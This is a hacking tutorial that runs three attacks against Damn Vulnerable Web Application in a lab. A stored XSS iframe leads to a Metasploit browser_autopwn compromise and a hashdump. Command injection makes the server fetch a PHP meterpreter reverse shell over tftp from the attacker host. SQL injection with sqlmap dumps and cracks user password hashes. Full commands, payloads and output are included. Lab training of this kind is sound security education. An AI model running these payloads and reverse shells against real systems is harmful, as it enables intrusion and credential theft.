Hello and welcome. Today I’ll be writing a tutorial on the basics of web-hacking. To make the learning experience more enjoyable we’ll be using ”Damn Vulnerable Web Application (DVWA)” which is designed as a web security learning platform. I will only be demonstrating three scenarios which lead to a server compromise: (1) Persistent XSS + IFRAME, (2) Command Execution and (3) MySQL Injection. There are many more test cases which can be examined but I leave that up to the diligent readers own discretion. You can download “Damn Vulnerable Web Application (DVWA)” here. Setting up this lab is quite easy so don’t hesitate to try it for yourself…
Ok let’s get to the good stuff, I’ll be using two VM’s:
Attacker: Backtrack 5 => 192.168.111.129
Victim: Windows XP => 192.168.111.130
Cross Site Scripting, isn’t always appreciated as a legitimate attack vector but as we’ll see persistent XSS can have some nasty implications. We’ll start of by browsing to the ”Sign Guestbook” page. Due to unsanitized user input we are able to inject client-side scripts into the message box. Using an IFRAME we can redirect any user visiting this Guestbook to our malicious server. In the screenshot below you can see our “innocent” message being posted. You should take note of the URI Path being used "/innocent".
Code: <iframe SRC="http://192.168.111.129/innocent" height = ”0” width = ”0”>
Sign Guestbook
Ok so far so good, now let’s set up a client-side exploit server for our unsuspecting victim to connect to. First of all make sure your Backtrack machine isn’t already using port 80 (for example if you’re hosting an Apache server). Fire up msfconsole and select the browser_autopwn module, take care to configure the options properly. Below you can see my sample configuration (be sure to set the correct URI Path)…
msf auxiliary(browser_autopwn) > show options Module options (auxiliary/server/browser_autopwn): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.111.129 yes The IP address to use for reverse-connect payloads SRVHOST 192.168.111.129 yes The local host to listen on. SRVPORT 80 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate SSLVersion SSL3 no Specify the version of SSL that should be used URIPATH /innocent no The URI to use for this exploit (default is random) msf auxiliary(browser_autopwn) > exploit [*] Auxiliary module execution completed [*] Setup [*] Obfuscating initial javascript 2011-11-09 05:36:52 +0100 [*] Done in 1.041111216 seconds [*] Starting exploit modules on host 192.168.111.129... [*] --- [*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp [*] Using URL: http://192.168.111.129:80/EKlBI [*] Server started. [*] Starting exploit multi/browser/java_calendar_deserialize with payload java/meterpreter/reverse_tcp [*] Using URL: http://192.168.111.129:80/hhbLra [*] Server started. [*] Starting exploit multi/browser/java_trusted_chain with payload java/meterpreter/reverse_tcp [*] Using URL: http://192.168.111.129:80/JaTFlOKmWUq [...snip...] [*] --- Done, found 23 exploit modules [*] Using URL: http://192.168.111.129:80/innocent [*] Server started.
Perfect, everything is set-up. All we have to do now is wait for our unsuspecting victim to view the Guestbook page. As you can see in the screenshot below, when our victim views the page he/she cannot visually see anything malicious about our post (if you like you can even insert a real message before your IFRAME). Even though nothing fishy seems to be going on our victim is redirected to our exploit server which leverages browser exploits to get shell access. Game Over!!
Victim
[*] Using URL: http://192.168.111.129:80/innocent [*] Server started. [*] 192.168.111.130 Browser Autopwn request '/innocent' [*] 192.168.111.130 Browser Autopwn request '/innocent?sessid=TWljcm9zb2Z0IFdpbmRvd3M6WFA6U1AwOmVuLXVzOng4NjpNU0lFOjYuMDo%3d' [*] 192.168.111.130 JavaScript Report: Microsoft Windows:XP:SP0:en-us:x86:MSIE:6.0: [*] Responding with exploits [*] Sending MS03-020 Internet Explorer Object Type to 192.168.111.130:1083... [*] Sending Internet Explorer DHTML Behaviors Use After Free to 192.168.111.130:1084 (target: IE 6 SP0-SP2 (onclick))... [*] Sending stage (752128 bytes) to 192.168.111.130 [*] Meterpreter session 1 opened (192.168.111.129:3333 -> 192.168.111.130:1085) at 2011-11-09 05:38:35 +0100 [*] Session ID 1 (192.168.111.129:3333 -> 192.168.111.130:1085) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (3460) [*] Spawning notepad.exe process to migrate to [+] Migrating to 3684 [+] Successfully migrated to process msf auxiliary(browser_autopwn) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 FLUXX-J18BEF9YQ\Owner @ FLUXX-J18BEF9YQ 192.168.111.129:3333 -> 192.168.111.130:1085 msf auxiliary(browser_autopwn) > sessions -i 1 [*] Starting interaction with 1... meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:fc4305db8da15f1e2404624e4bf5045f:bfcea702c343c38e5598448fd52782e8::: Owner:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:d515e27c8b5a477fe5189a1377c6c7e2::: meterpreter > ps Process list ============ PID Name Arch Session User Path --- ---- ---- ------- ---- ---- 0 [System Process] 1000 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\System32\svchost.exe 1056 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\svchost.exe 1340 explorer.exe x86 0 FLUXX-J18BEF9YQ\Owner C:\WINDOWS\Explorer.EXE [...snip...] 636 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe 648 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe 808 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe 908 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe meterpreter > migrate 648 [*] Migrating to 648... [*] Migration completed successfully. meterpreter > shell Process 3952 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>ipconfig ipconfig Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : localdomain IP Address. . . . . . . . . . . . : 192.168.111.130 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : C:\WINDOWS\system32>...Game Over...
If we browse to the ”Command Execution” tab we are presented with a small PHP utility that allows us to ping remote machines. After a bit of fooling around I discovered you can make the utility execute multiple commands by chaining them together with the ”&” character. Our end-game ploy in this demo is to remotely execute a PHP exploit. So first of all we have to find a way to transfer our malicious payload to the remote machine. There are many ways to do this: ftp, tftp, inline transfer, web browser,… To get an idea of what we have to work with we can get a directory list of C:\WINDOWS\system32 which will contain binaries of the programs that are installed on the remote server. As we can see below we are in luck, tftp is installed on the remote machine (this is most practical transfer method for non-interactive command line execution).
Code: & cd ../../../../../../../../WINDOWS/system32 & dir
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS] [-r count] [-s count] [[-j host-list] | [-k host-list]] [-w timeout] target_name Options: -t Ping the specified host until stopped. To see statistics and continue - type Control-Break; To stop - type Control-C. -a Resolve addresses to hostnames. -n count Number of echo requests to send. -l size Send buffer size. -f Set Don't Fragment flag in packet. -i TTL Time To Live. -v TOS Type Of Service. -r count Record route for count hops. -s count Timestamp for count hops. -j host-list Loose source route along host-list. -k host-list Strict source route along host-list. -w timeout Timeout in milliseconds to wait for each reply. Volume in drive C has no label. Volume Serial Number is 7833-0FA5 Directory of C:\WINDOWS\system32 [...snip...] 08/29/2002 08:00 PM 71,168 telnet.exe 08/29/2002 08:00 PM 343,552 termmgr.dll 08/29/2002 08:00 PM 200,192 termsrv.dll 08/29/2002 08:00 PM 16,896 tftp.exe 08/29/2002 08:00 PM 384,000 themeui.dll 08/29/2002 08:00 PM 90,112 timedate.cpl 08/29/2002 08:00 PM 4,048 timer.drv [...snip...] 08/29/2002 08:00 PM 9,728 xolehlp.dll 08/29/2002 08:00 PM 187,904 xpsp1res.dll 08/29/2002 08:00 PM 316,416 zipfldr.dll 1635 File(s) 254,218,638 bytes 39 Dir(s) 2,506,862,592 bytes free
Let’s go back to our Backtrack machine to create our PHP payload and set up a tftp server to host it.
root@bt:~# atftpd --daemon --port 69 /tmp/ root@bt:~# netstat -anup Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name udp 0 0 192.168.111.129:53569 192.168.111.1:53 ESTABLISHED 1496/firefox-bin udp 0 0 0.0.0.0:68 0.0.0.0:* 1797/dhclient udp 0 0 0.0.0.0:68 0.0.0.0:* 1075/dhclient3 udp 0 0 0.0.0.0:69 0.0.0.0:* 2004/atftpd root@bt:~# msfpayload php/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=9988 O Name: PHP Meterpreter, PHP Reverse TCP stager Module: payload/php/meterpreter/reverse_tcp Version: 12196, 12196 Platform: PHP Arch: php Needs Admin: No Total size: 1286 Rank: Normal Provided by: egypt <egypt@metasploit.com> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.111.129 yes The listen address LPORT 9988 yes The listen port Description: Reverse PHP connect back stager with checks for disabled functions, Run a meterpreter server in PHP root@bt:~# msfpayload php/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=9988 R > /tmp/evil.php root@bt:~# ls -l /tmp/ total 28 drwx------ 2 root root 4096 2011-11-09 04:17 kde-root drwx------ 2 root root 4096 2011-11-09 04:17 ksocket-root drwx------ 2 root root 4096 2011-11-09 04:17 orbit-root drwx------ 2 root root 4096 2011-11-09 04:17 pulse-3uavuaOb9vyJ -rw------- 1 root root 141 2011-11-09 04:17 serverauth.pWwJb7S99J drwx------ 2 root root 4096 2011-11-09 04:17 ssh-ZXZzWw1229 -rw-r--r-- 1 root root 1286 2011-11-09 04:44 evil.php
Ok we’re all set let’s return to our ”Command Execution” tab. We are going to make the remote machine use tftp to download out payload and place it in the web root. Take note that xampp’s web root is located in C:\xampp\htdocs. As we can see in the screenshot below our payload has successfully been downloaded. Once this has been accomplished we can use the attackers browser to open http://192.168.111.130/evil.php,this will then automatically execute our payload. Game Over!!
Code: & cd c:\xampp\htdocs & tftp -i 192.168.111.129 GET evil.php
php transfer
msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.111.129 yes The listen address LPORT 9988 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Started reverse handler on 192.168.111.129:9988 [*] Starting the payload handler... [*] Sending stage (38553 bytes) to 192.168.111.130 [*] Meterpreter session 1 opened (192.168.111.129:9988 -> 192.168.111.130:1053) at 2011-11-09 05:16:13 +0100 meterpreter > shell Process 3156 created. Channel 0 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\xampp\apache>...Game Over...
To wrap up the tutorial let’s have a look at MySQL injection. To follow this tutorial in Backtrack you’ll have to install a firefox plug-in called Tamper Data, it will allow you to intercept and modify HTTP/HTTPS headers and POST parameters (big up to anyone who has modified some poorly configured online poll hehe). Browse to the ”SQL Injection” tab, start Tamper Data, enter a number in the field (1 to 5) and press enter. Tamper Data will alert you that it has intercepted a request, allow it to continue and then examine the contents of the data. You should see something like in the screenshot below.
Tamper Data
Copy the entire content of the ”Cookie” field. We will be using this data as a parameter for sqlmap. Achieving injection is pretty easy, observe the syntax below…
root@bt:/pentest/database/sqlmap# ./sqlmap.py --url='http://192.168.111.130/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=scmkpnhd6a9smq30rvjkse6ts0; security=low' [...snip...] sqlmap identified the following injection points with a total of 136 HTTP(s) requests: --- Place: GET Parameter: id Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=1' AND (SELECT 3474 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,112,117,58),(SELECT (CASE WHEN (3474=3474) THEN 1 ELSE 0 END)),CHAR(58,113,101,109,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'iXZd'='iXZd&Submit=Submit Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,106,112,117,58),IFNULL(CAST(CHAR(75,115,118,88,119,75, 101,111,85,115) AS CHAR),CHAR(32)),CHAR(58,113,101,109,58)), NULL# AND 'fpda'='fpda&Submit=Submit Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1' AND SLEEP(5) AND 'ZrXF'='ZrXF&Submit=Submit --- [06:16:54] [INFO] manual usage of GET payloads requires url encoding [06:16:54] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: Apache 2.2.21, PHP 5.3.8 back-end DBMS: MySQL 5.0 [06:16:54] [INFO] Fetched data logged to text files under /pentest/database/sqlmap/output/192.168.111.130 [*] shutting down at: 06:16:54
So injection is successful, you can see that we used the data recovered from Tamper Data (note that without this cookie-data injection cannot be achieved). If we add the --dbs tag to the command above we will get a list of the available databases, as shown below.
[...snip...] [06:19:36] [INFO] fetching database names available databases [8]: [*] cdcol [*] dvwa [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test [*] webauth [...snip...]
After some enumeration, I discovered that the Database “dvwa” contained a Table named “users”. Dumping this Table reveals a list of users and their encrypted passwords. I then proceeded to run a dictionary based attack on these hashes and in less than 30 seconds they were all decrypted. Game Over!!
root@bt:/pentest/database/sqlmap# ./sqlmap.py --url='http://192.168.111.130/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=scmkpnhd6a9smq30rvjkse6ts0; security=low' -D dvwa -T users --dump [...snip...] +---------------------------------+------------+-----------+----------------------------------+---------+ | avatar | first_name | last_name | password | user | +---------------------------------+------------+-----------+----------------------------------+---------+ | dvwa/hackable/users/admin.jpg | admin | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | admin | | dvwa/hackable/users/smithy.jpg | Bob | Smith | 5f4dcc3b5aa765d61d8327deb882cf99 | smithy | | dvwa/hackable/users/pablo.jpg | Pablo | Picasso | 0d107d09f5bbe40cade3de5c71e9e9b7 | pablo | | dvwa/hackable/users/1337.jpg | Hack | Me | 8d3533d75ae2c3966d7e0d4fcc69216b | 1337 | | dvwa/hackable/users/gordonb.jpg | Gordon | Brown | e99a18c428cb38d5f260853678922e03 | gordonb | +---------------------------------+------------+-----------+----------------------------------+---------+ +---------+ +------------+ | user | | passwords | +---------+ +------------+ | admin | ===> | password | | smithy | ===> | password | | pablo | ===> | letmein | | 1337 | ===> | charley | | gordonb | ===> | abc123 | +---------+ +------------+